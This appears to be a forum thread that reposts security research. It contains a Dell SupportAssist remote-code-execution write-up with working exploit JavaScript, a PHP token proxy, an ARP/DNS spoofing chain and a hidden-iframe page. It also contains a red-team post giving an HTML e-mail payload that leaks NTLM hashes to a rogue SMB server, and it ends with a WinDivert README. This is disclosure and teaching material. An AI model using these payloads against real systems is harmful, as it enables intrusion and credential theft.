    This exploit is a combination of existing issues, which together form a zero-day exploit with the potential to be very harmful for Google users. I reported the issue to Google back in November 2018, but they have not confirmed the issue from their side or made any headway addressing it. They cited “difficulties in communication with the team investigating”, which felt a lot like what happened during the report of the XML Sitemaps exploit.

    My impression is that if a security issue affects a not commonly affected part of Google, then the internal lines of communication are not well oiled. It was March when I got the first details, when Google let me know “that our existing protection mechanisms should be able to prevent this type of abuse but the team is still running checks to validate this” – which didn’t agree with the evidence. I re-ran some of my tests and didn’t see a difference. The security team themselves were very responsive, as usual, but seemingly had no way to move things forward unfortunately.

    It was 140 days after the report when I let Google know I’d be publicly disclosing the vulnerability, given the lack of movement and the fact that this could already be impacting both Google search users, as well as website owners and advertisers. To their credit, Google didn’t attempt to dissuade me and asked me simply to use my best judgement in what I publish.

    If you have any questions, comments or information you can find me on Twitter at @TomAnthonySEO, or if you are interested in consulting for technical/specialised SEO, you can contact me via Distilled.

    Disclosure Timeline

    • 3rd November 2018 – I filed the initial bug report.
    • Over the next few weeks/months we went back and forth a bit.
    • 11th February 2019 – Google responded letting me know they were “surfacing some difficulties in communication with the team investigating”
    • 17th April 2019 – Google confirmed they have no immediate plans to fix this. I believe this is probably because they are preparing to release a new build of Googlebot shortly (I wonder if this was why the back and forth was slow – they were hoping to release the update?)

     

    Sursa: http://www.tomanthony.co.uk/blog/xss-attacks-googlebot-index-manipulation/

  12. Remote Code Execution on most Dell computers

    What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities in mass, we might think of vulnerabilities in the operating system, but another attack vector to consider is “What third-party software came with my PC?”. In this article, I’ll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to “proactively check the health of your system’s hardware and software” and which is “preinstalled on most of all new Dell devices”.

    Discovery

    Back in September, I was in the market for a new laptop because my 7-year-old Macbook Pro just wasn’t cutting it anymore. I was looking for an affordable laptop that had the performance I needed and I decided on Dell’s G3 15 laptop. I decided to upgrade my laptop’s 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell’s support site, I was prompted with an interesting option.

    Support Page

    “Detect PC”? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened.

    SupportAssist Download Prompt

    A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn’t installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website.

    Installing it was a painless process with just a click-to-install button. In the shadows, the SupportAssist Installer created the SupportAssistAgent and the Dell Hardware Support services. These services correspond to .NET binaries, which made it easy to reverse engineer what they did. After installing, I went back to the Dell website and decided to check what it could find.

    Download Drivers

    I opened the Chrome Web Inspector and the Network tab then pressed the “Detect Drivers” button.

    Network Tab

    The website made requests to port 8884 on my local computer. Checking that port out on Process Hacker showed that the SupportAssistAgent service had a web server on that port. What Dell was doing is exposing a REST API of sorts in their service which would allow communication from the Dell website to do various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests.

    On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken, which also indicates when the signature expires. After pressing “download drivers” on the web side, this request was of particular interest:

    POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: application/json
    Origin: https://www.dell.com
    Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    

    The body:

    [
        {
        "title":"Dell G3 3579 and 3779 System BIOS",
        "category":"BIOS",
        "name":"G3_3579_1.9.0.exe",
        "location":"https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe",
        "isSecure":false,
        "fileUniqueId":"acd94f47-7614-44de-baca-9ab6af08cf66",
        "run":false,
        "restricted":false,
        "fileId":"198393521",
        "fileSize":"13 MB",
        "checkedStatus":false,
        "fileStatus":-99,
        "driverId":"4WW45",
        "path":"",
        "dupInstallReturnCode":"",
        "cssClass":"inactive-step",
        "isReboot":true,
        "DiableInstallNow":true,
        "$$hashKey":"object:175"
        }
    ]
    

    It seemed like the web client could make direct requests to the SupportAssistAgent service to “download and manually install” a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued.

    On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.

    ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks, for example making sure the request came from the local machine, among various other checks. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE.

    An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell:

    // Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0
    public static bool ValidateDomain(Uri request, Uri urlReferrer)
    {
        return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower())
            && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost"))
            && request.Scheme.ToLower().StartsWith("http")
            && urlReferrer.Scheme.ToLower().StartsWith("http");
    }
    
    // Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124
    public static bool ValidateDomain(string domain)
    {
        return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca") || domain.EndsWith(".dell.com.mx")
            || domain.EndsWith(".dell.com.br") || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar")
            || domain.EndsWith(".supportassist.com");
    }
    

    The issue with the function above is the fact that it really isn’t a solid check and gives an attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:

    1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to find one on the sites designated for SupportAssist)
    2. Find a Subdomain Takeover vulnerability
    3. Make the request from a local program
    4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.

    In the end, I decided to go with option 4, and I’ll explain why in a later bit. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS.
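
    The weakness is easier to see when the check is transcribed into Python (logic copied from the decompiled C# above; the test hostnames are made up):

```python
WHITELISTED_SUFFIXES = (
    ".dell.com", ".dell.ca", ".dell.com.mx", ".dell.com.br",
    ".dell.com.pr", ".dell.com.ar", ".supportassist.com",
)

def validate_domain(referrer_host: str) -> bool:
    # endswith-only matching: any host under these suffixes is trusted
    return referrer_host.lower().endswith(WHITELISTED_SUFFIXES)

assert validate_domain("www.dell.com")              # the intended origin
assert validate_domain("x9f2k.dell.com")            # DNS-hijacked throwaway name (option 4)
assert validate_domain("forgotten-cname.dell.ca")   # a subdomain takeover passes too (option 2)
assert not validate_domain("attacker.example.com")  # unrelated hosts are rejected
```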

    When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell’s support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browser’s console.

    At first, the website tries to detect SupportAssist by looping through the aforementioned service ports and connecting to the service method “isalive”. What was interesting was that it passed a “Signature” parameter and an “Expires” parameter. To find out more, I reversed the JavaScript side in the browser. Here’s what I found out:

    1. First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest “Token”, or the signatures I was talking about earlier. The endpoint also provides the “Expires token”. This solves the signature problem.
    2. Next, the browser makes a request to each service port with a style like this: http://127.0.0.1:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE].
    3. The SupportAssist client then responds when the right service port is reached, with a style like this:
      {
       "isAlive": true,
       "clientVersion": "[CLIENT VERSION]",
       "requiredVersion": null,
       "success": true,
       "data": null,
       "localTime": [EPOCH TIME],
       "Exception": {
           "Code": null,
           "Message": null,
           "Type": null
       }
      }
      
    4. Once the browser sees this, it continues with further requests using the now determined service port.
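
    The detection handshake above is easy to reproduce outside the browser. A hedged sketch of the port-probing loop the dell.com JavaScript performs (the expires and signature values still have to come from the getdsdtoken endpoint):

```python
import json
import urllib.request

SERVICE_PORTS = (8884, 8883, 8886, 8885)  # the agent binds the first free one

def find_agent(expires: str, signature: str, ports=SERVICE_PORTS):
    """Probe each candidate port with a signed isalive request, the way the
    dell.com page locates a running SupportAssist agent."""
    for port in ports:
        url = ("http://127.0.0.1:%d/clientservice/isalive/"
               "?expires=%s&signature=%s" % (port, expires, signature))
        try:
            with urllib.request.urlopen(url, timeout=2) as resp:
                reply = json.load(resp)
        except (OSError, ValueError):
            continue  # nothing listening there, or not the agent
        if reply.get("isAlive"):
            return port, reply
    return None, None
```

    If an agent is running, this returns the discovered service port plus the heartbeat JSON shown in step 3; every later request reuses that port.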

    A concerning thing I noticed while looking at the different types of requests I could make is that the “getsysteminfo” route returns a very detailed description of every piece of hardware connected to my computer. Even through cross-site scripting I was able to access this data, which is an issue because it allows seriously fingerprinting a system and finding sensitive information.

    Here are the methods the agent exposes:

    clientservice_getdevicedrivers - Grabs available updates.
    diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
    downloadservice_downloadfiles - Downloads a JSON array of files.
    clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
    clientservice_getservicetag - Grabs the service tag.
    localclient_img - Connects to SignalR (Dell Hardware Support).
    diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
    clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally.
    diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system.
    downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
    diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
    diagnosticsservice_launchtool - Launches a diagnostic tool.
    diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
    downloadservice_createiso - Download an ISO.
    clientservice_checkadminrights - Check if the Agent is privileged.
    diagnosticsservice_performinstallation - Update SupportAssist.
    diagnosticsservice_rebootsystem - Reboot system.
    clientservice_getdevices - Grab system devices.
    downloadservice_dlmcommand - Check on the status of or cancel an ongoing download.
    diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support).
    downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall.
    downloadservice_createbootableiso - Download bootable iso.
    diagnosticsservice_isalive - Heartbeat check.
    downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
    clientservice_getscanresults - Gets driver scan results.
    downloadservice_restartsystem - Restarts the system.
    

    The one that caught my interest was downloadservice_downloadandautoinstall. This method downloads a file from a specified URL and then runs it. It is run by the browser when the user needs to install certain drivers that need to be installed automatically.

    1. After finding which drivers need updating, the browser makes a POST request to “http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE]”.
    2. The browser sends a request with the following JSON structure:
      [
       {
       "title":"DOWNLOAD TITLE",
       "category":"CATEGORY",
       "name":"FILENAME",
       "location":"FILE URL",
       "isSecure":false,
       "fileUniqueId":"RANDOMUUID",
       "run":true,
       "installOrder":2,
       "restricted":false,
       "fileStatus":-99,
       "driverId":"DRIVER ID",
       "dupInstallReturnCode":0,
       "cssClass":"inactive-step",
       "isReboot":false,
       "scanPNPId":"PNP ID",
       "$$hashKey":"object:210"
       }
      ] 
      
    3. After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost.
    4. ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod.
    5. ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the “downloadandautoinstall” method:
      if (service_Method == "downloadservice_downloadandautoinstall")
      {
       string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty;
       result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
      } 
      

      Which calls DownloadServiceLogic.DownloadAndAutoInstall and provides the files we sent in the JSON payload.

    6. DownloadServiceLogic.DownloadAndAutoInstall acts as a wrapper (e.g. handling exceptions) for DownloadServiceLogic._HandleJson.
    7. DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:
      foreach (File file in list)
      {
       bool flag2 = file.Location.ToLower().StartsWith("http://");
       if (flag2)
       {
           file.Location = file.Location.Replace("http://", "https://");
       }
       bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location);
       if (flag3)
       {
           DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method");
           throw new InvalidFileException();
       }
      }
      DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);
      

    The above code loops through every file and checks whether the file URL we provided starts with http:// (if it does, it is replaced with https://), and checks that the URL's host matches a list of Dell's download servers (not all subdomains):

    public static bool CheckDomain(string fileLocation)
    {
    	List<string> list = new List<string>
    	{
    		"ftp.dell.com",
    		"downloads.dell.com",
    		"ausgesd4f1.aus.amer.dell.com"
    	};
    	
    	return list.Contains(new Uri(fileLocation.ToLower()).Host);
    } 
    
    8. Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest, at which point SupportAssist downloads and runs the files as Administrator.

    This is all the information we need to start writing an exploit.

    Exploitation

    The first issue we face is making requests to the SupportAssist client. Assume for now that we are in the context of a Dell subdomain; we’ll get into how exactly we achieve this later in this section. I decided to mimic the browser and make requests using JavaScript.

    First things first, we need to find the service port. We can do this by polling through the predefined service ports, and making a request to “/clientservice/isalive”. The issue is that we need to also provide a signature. To get the signature that we pass to isalive, we can make a request to “https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken”.

    This isn’t as straightforward as it might seem. The “Access-Control-Allow-Origin” header of the signature URL is set to “https://www.dell.com”. This is a problem, because we’re in the context of a subdomain, probably not over https. How do we get past this barrier? We make the request from our own servers!

    The signatures that are returned from “getdsdtoken” are applicable to all machines, and not unique. I made a small PHP script that will grab the signatures:

    <?php
    header('Access-Control-Allow-Origin: *');
    echo file_get_contents('https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken');
    ?> 
    

    The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the “getdsdtoken” route. The “getdsdtoken” route returns JSON with signatures and an expire time. We can just use JSON.parse on the results to place the signatures into a javascript object.

    Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each server port, and if we reach it, we set the server_port variable (global) to the port that responded:

    function FindServer() {
    	ports.forEach(function(port) {
    		var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
    		var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
    	});
    } 
    

    After we have found the server, we can send our payload. This was the hardest part: there are some serious obstacles before “downloadandautoinstall” executes our payload.

    Starting with the hardest issue: the SupportAssist client has a hard whitelist on file locations. Specifically, the host must be either “ftp.dell.com”, “downloads.dell.com”, or “ausgesd4f1.aus.amer.dell.com”. I almost gave up at this point, because I couldn’t find an open redirect vulnerability on any of the sites. Then it hit me: we can do a man-in-the-middle attack.

    If we could provide the SupportAssist client with an http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge.

    The second obstacle was designed specifically to counter my solution to the first. If we look back at the steps I outlined, a file URL that starts with http:// has it replaced by https://, and we can’t realistically intercept and change the contents of a proper https connection. The key to bypassing this mitigation was in the exact wording: “if the URL starts with http://, it will be replaced by https://”. If the URL string did not start with http://, then even if http:// appeared somewhere else in the string, it wouldn’t be replaced. Getting a URL to work was tricky, but I eventually came up with “ http://downloads.dell.com/abcdefg” (the space is intentional). When you run the string through the starts-with check, it returns false, because the string starts with “ ”, thus leaving the “http://” alone.
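
    The two checks and the bypass are easy to reproduce in a few lines. This is a Python sketch of the decompiled C# logic above, not Dell's code; the strip() models the tolerance of .NET's Uri class for the leading space:

    ```python
    from urllib.parse import urlparse

    # The agent's whitelist of Dell download hosts.
    ALLOWED_HOSTS = {"ftp.dell.com", "downloads.dell.com",
                     "ausgesd4f1.aus.amer.dell.com"}

    def upgrade_scheme(location):
        """Mirror the agent's rewrite: only upgrade when the string
        *starts with* http://, so a leading space defeats it."""
        if location.lower().startswith("http://"):
            location = location.replace("http://", "https://")
        return location

    def check_domain(location):
        """Mirror SecurityHelper.CheckDomain: compare the parsed host
        against the whitelist.  The strip() models .NET Uri's tolerance
        for leading whitespace."""
        return urlparse(location.strip().lower()).netloc in ALLOWED_HOSTS
    ```

    Running the payload URL “ http://downloads.dell.com/abcdefg” through both functions shows the scheme staying plain http while the host whitelist still passes.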

    I made a function that automated sending the payload:

    function SendRCEPayload() {
    	var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;
    
    	var xmlhttp = new XMLHttpRequest();
    	xmlhttp.open("POST", auto_install_url, true);
    
    	var files = [];
    	
    	files.push({
    	"title": "SupportAssist RCE",
    	"category": "Serial ATA",
    	"name": "calc.EXE",
    	"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
    	"isSecure": false,
    	"fileUniqueId": guid(),
    	"run": true,
    	"installOrder": 2,
    	"restricted": false,
    	"fileStatus": -99,
    	"driverId": "FXGNY",
    	"dupInstallReturnCode": 0,
    	"cssClass": "inactive-step",
    	"isReboot": false,
    	"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
    	"$$hashKey": "object:210"});
    	
    	xmlhttp.send(JSON.stringify(files)); 
    }
    

    Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker’s machine):

    1. Grab the interface IP address for the specified interface.
    2. Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the javascript payload which we mentioned earlier.
    3. To ARP spoof the victim, we first enable IP forwarding, then send an ARP packet to the victim telling it that we’re the router and an ARP packet to the router telling it that we’re the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we send the original MAC addresses to the victim and router.
    4. Finally, we DNS Spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL.
    5. When the victim visits our subdomain (either directly via url or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com which is when we return the binary payload.
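
    The Host-header dispatch in step 2 can be sketched as a pure decision function (Python; the payload labels are placeholders, and in the real proof of concept this logic would sit inside the mock web server's request handler):

    ```python
    def select_payload(host):
        """Decide which payload the mock web server should return,
        based on the victim's Host header (step 2 above)."""
        host = (host or "").lower()
        if host == "downloads.dell.com":
            return "binary"       # the executable the agent will run
        if host.endswith("dell.com"):
            return "javascript"   # the browser-side exploit page
        return "none"             # not a request we care about
    ```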

    You can read Dell’s advisory here.

    Demo

    Here’s a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here.

    The source code of the dellrce.html file featured in the video is:

    <h1>CVE-2019-3719</h1>
    <h1>Nothing suspicious here... move along...</h1>
    <iframe src="http://www.dellrce.dell.com" style="width: 0; height: 0; border: 0; border: none; position: absolute;"></iframe>
    

    Timeline

    10/26/2018 - Initial write up sent to Dell.

    10/29/2018 - Initial response from Dell.

    11/22/2018 - Dell has confirmed the vulnerability.

    11/29/2018 - Dell scheduled a “tentative” fix to be released in Q1 2019.

    01/28/2019 - Disclosure date extended to March.

    03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.

    04/18/2019 - Vulnerability disclosed as an advisory.

    Written on April 30, 2019

     

    Sursa: https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/

  13. Love letters from the red team: from e-mail to NTLM hashes with Microsoft Outlook

    ntlm, security, red team — 03 July 2018

    fisherman-for-blog.jpg

    Introduction

    A few months ago Will Dormann of CERT/CC published a blog post [1] describing a technique where an adversary could abuse Microsoft Outlook together with OLE objects, a feature of Microsoft Windows since its early days, to force the operating system to leak Net-NTLM hashes.

    Last year we wrote a blog post [2] that touched the subject of NTLM hash leakage via a different angle, by abusing common web application vulnerabilities such as Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) to achieve the same goals and obtain the precious hashes we all love and cherish. We recommend reading the post we published previously before continuing unless you are familiar with how Windows single sign-on authenticates itself in corporate networks.

    Here in Blaze Information Security we have been using for a while, with a high success rate, a similar technique to force MS Outlook to give out NTLM hashes with little to no interaction other than reading a specially-crafted e-mail message. Just recently, while we were writing this blog post, NCC Group published [5] in their blog an article describing the same technique we have been using along with other details, so we decided to publish ours explaining the approach we use and how to mitigate the risk presented by this issue.

    A brief history of SMB-to-NTLM hashes attacks

    In a post to the Bugtraq mailing list in March 1997 (yes, 21 years ago) Aaron Spangler wrote about a vulnerability [3] in versions of Internet Explorer and Netscape Navigator that worked by embedding an IMG tag with the 'src' value pointing to an SMB share instead of an HTTP or HTTPS page. This would force Windows to initiate an NTLM authentication with a modified SMB server that could fetch the user's Net-NTLM hashes.

    Interestingly, Aaron's Bugtraq post also hinted at a theoretical flaw in the authentication protocol that would later become known as SMBRelay attacks, though these emerged only a few years later.

    Fast forward to 2016, a Russian security researcher named ValdikSS wrote [6] on Medium what seems to have been a modern replica of the same experiment Spangler did 19 years ago, with little to no modification from the original attack vector.

    Abusing Microsoft Outlook to steal Net-NTLM hashes

    Rather than using the CERT/CC technique (taking advantage of the possibility to embed OLE objects inside an RTF, DOC or PDF, which may make security software integrated with the e-mail server raise its eyebrows), this technique exploits Outlook's handling of HTML messages with images and the behavior described in the Bugtraq post of 1997. HTML e-mails with embedded images are very popular, especially in corporate environments, and are less likely to be screened or blocked by anti-virus software and e-mail gateways.

    The Net-NTLM hashes will be leaked via SMB traffic to an external rogue SMB server, like Responder (our tool of choice for the demo), Core Security's Impacket smbrelay or ntlmrelay or even a custom SMB server.

    In a nutshell, the attack works by sending an e-mail to victim in HTML format, with an image pointing to an external SMB server. The image can be, for example, a HTML-based e-mail signature. The client will automatically initiate a NTLM authentication against the rogue server, ultimately leaking its hashes.

    From a victim's perspective, depending on how Outlook is configured to render images in HTML e-mails, there may in some cases be an alert about opening external content, and this may hint at abnormal behavior. Nevertheless, it is a common occurrence for many Outlook users to have to click through a warning to render an image, so this does not pose a strong obstacle for this exploitation vector. On slower connections we have also sometimes noticed a very quick pop-up before content is fetched from the remote SMB server, also a regular occurrence that is unlikely to raise suspicion.

    Frequently Outlook is configured to render images automatically when the sender is trusted; common trust relationships exist when the sender is internal to the organization. For instance, sending an HTML e-mail with an IMG tag pointing to a rogue SMB server from malicious-adversary@blazeinfosec.com to victim@blazeinfosec.com will make the Outlook client of victim@blazeinfosec.com render the e-mail automatically and leak NTLM hashes. This can be useful in a scenario where a penetration tester or red teamer has compromised a single e-mail account in the target organization and will use it to compromise other users individually or en masse by sending the booby-trapped e-mail to a distribution list.

    Even though in some situations this technique is not as silent as the one described by Will Dormann, it has proved to be very effective in many of our engagements and should be in your attack toolbox.

    It is worth remembering that Net-NTLM hashes, unlike pure NTLM hashes, cannot be used in pass-the-hash attacks; they can, however, be relayed (under some circumstances) [9] or cracked using off-the-shelf tools like hashcat.

    Exploitation steps

    Even though all it takes to exploit the issue is the ability to send an HTML e-mail, meaning it is possible to use any e-mail client or even a script to automate this attack, in this section we will describe how to achieve this using Microsoft Outlook itself.

    1) Create a HTML file with the following content:

    <html>  
    <img src="file:///10.30.1.23/test">Test NTLM leak via Outlook  
    </html>  
    

    The IP address above is for illustration only and was used in our labs. It can be any IP or hostname, including remote addresses.

    2) Create an e-mail message to the target. Add the HTML payload as an attachment but using the option "Insert as Text" so it will create the e-mail message as HTML.

    capture5-1.png

    3) The victim opens the e-mail without any further interaction:

    Capture3.PNG

    4) The target's Net-NTLM hashes were automatically captured by our Responder:

    Zrzut-ekranu-z-2018-06-28-16-42-32.png
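
    As noted earlier, any e-mail client or even a script can deliver the same message. A hypothetical Python sketch that builds the equivalent HTML e-mail (the addresses and subject are placeholders; the result would then be handed to an SMTP server via smtplib):

    ```python
    from email.message import EmailMessage

    def build_leak_email(sender, recipient, smb_host="10.30.1.23"):
        """Build the same HTML message as the Outlook steps above, with an
        image reference pointing at a rogue SMB server (smb_host)."""
        msg = EmailMessage()
        msg["From"] = sender
        msg["To"] = recipient
        msg["Subject"] = "Quarterly report"  # arbitrary pretext
        msg.set_content("Your client does not render HTML.")
        msg.add_alternative(
            f'<html><img src="file:///{smb_host}/test">'
            "Test NTLM leak via Outlook</html>",
            subtype="html",
        )
        return msg

    # The message could then be sent with smtplib.SMTP(...).send_message(msg).
    ```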

    An important requirement for this exploit to work is obviously the ability of the target to connect to the attacker's SMB server on port 445. Some ISPs block this port by default, while many others do not. Interestingly enough, Microsoft maintains a small list [8] of ISPs that do and do not filter outbound access to port 445.
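
    Whether a given network allows outbound SMB can be verified with a plain TCP connect. A small Python sketch (the host, port, and timeout values are illustrative):

    ```python
    import socket

    def tcp_port_reachable(host, port=445, timeout=2.0):
        """Return True if a TCP connection to host:port succeeds -- a quick
        way to test whether outbound SMB (port 445) is being filtered."""
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False
    ```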

    Preventing the issue

    Once again, the problem described in this post is a design decision from Windows and for over 20 years it is known that it can be abused in a myriad of scenarios.

    There are a couple different ways to reduce the impact brought by this insecure behavior.

    Setting the value of the registry key RestrictSendingNTLMTraffic to 2 under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 will reduce the exposure to this risk, as Windows will no longer send NTLMv1 or NTLMv2 hashes when challenged by a server, whether legitimate or rogue.

    However, it is likely to break functionality and single sign-on mechanisms, especially in corporate networks that heavily rely on NTLM authentication.

    Back in 2017 without much advertisement Microsoft also released a mitigation [4] for Windows 10 and Windows Server 2016 that prevents NTLM SSO authentication with resources that are not marked as internal by the Windows Firewall, denying NTLM SSO authentication for public resources, ultimately limiting the exposure of Net-NTLM hashes when challenged by external services like an attacker-operated SMB server. This feature is not activated by default and a user has to opt-in by explicitly applying changes to the registry.

    From a network security perspective, the adverse effect of this weakness can be mitigated by defining firewall rules that disallow SMB connections to reach non-whitelisted external servers, or even better blocking all external SMB connections altogether if this can be considered an option.

    Conclusion

    There are security risks related to NTLM authentication that are frequently overlooked, despite having been known for over two decades now. Exploiting these issues is trivial and poses a serious risk to an organization, especially from an insider threat point of view or a compromised account scenario. Preventing the issue is not trivial, but some of the latest Microsoft patches and other carefully thought-out strategies to restrict NTLM traffic can help.

    Maybe one day Microsoft will release a patch or a service pack that will prevent Windows from leaking NTLM hashes all over the place.

    References

    [1] https://insights.sei.cmu.edu/cert/2018/04/automatically-stealing-password-hashes-with-microsoft-outlook-and-ole.html
    [2] https://blog.blazeinfosec.com/leveraging-web-application-vulnerabilities-to-steal-ntlm-hashes-2/
    [3] http://insecure.org/sploits/winnt.automatic.authentication.html
    [4] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170014
    [5] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smb-hash-hijacking-and-user-tracking-in-ms-outlook/
    [6] https://medium.com/@ValdikSS/deanonymizing-windows-users-and-capturing-microsoft-and-vpn-accounts-f7e53fe73834
    [7] http://witch.valdikss.org.ru/
    [8] https://social.technet.microsoft.com/wiki/contents/articles/32346.azure-summary-of-isps-that-allow-disallow-access-from-port-445.aspx
    [9] https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

     

    Sursa: https://blog.blazeinfosec.com/love-letters-from-the-red-team-from-e-mail-to-ntlm-hashes-with-microsoft-outlook/

  14. WinDivert 2.0: Windows Packet Divert
    ====================================
    
    1. Introduction
    ---------------
    
    Windows Packet Divert (WinDivert) is a user-mode packet interception library
    for Windows 7, Windows 8 and Windows 10.
    
    WinDivert enables user-mode capturing/modifying/dropping of network packets
    sent to/from the Windows network stack.  In summary, WinDivert can:
        - capture network packets
        - filter/drop network packets
        - sniff network packets
        - (re)inject network packets
        - modify network packets
    WinDivert can be used to implement user-mode packet filters, sniffers,
    firewalls, NATs, VPNs, IDSs, tunneling applications, etc..
    
    WinDivert supports the following features:
        - packet interception, sniffing, or dropping modes
        - support for loopback (localhost) traffic
        - full IPv6 support
        - network layer
        - simple yet powerful API
        - high-level filtering language
        - filter priorities
        - freely available under the terms of the GNU Lesser General Public
          License (LGPLv3)
    
    For more information see doc/windivert.html
    
    2. Architecture
    ---------------
    
    The basic architecture of WinDivert is as follows:
    
                                  +-----------------+
                                  |                 |
                         +------->|    PROGRAM      |--------+
                         |        | (WinDivert.dll) |        |
                         |        +-----------------+        |
                         |                                   | (3) re-injected
                         | (2a) matching packet              |     packet
                         |                                   |
                         |                                   |
     [user mode]         |                                   |
     ....................|...................................|...................
     [kernel mode]       |                                   |
                         |                                   |
                         |                                   |
                  +---------------+                          +----------------->
      (1) packet  |               | (2b) non-matching packet
     ------------>| WinDivert.sys |-------------------------------------------->
                  |               |
                  +---------------+
    
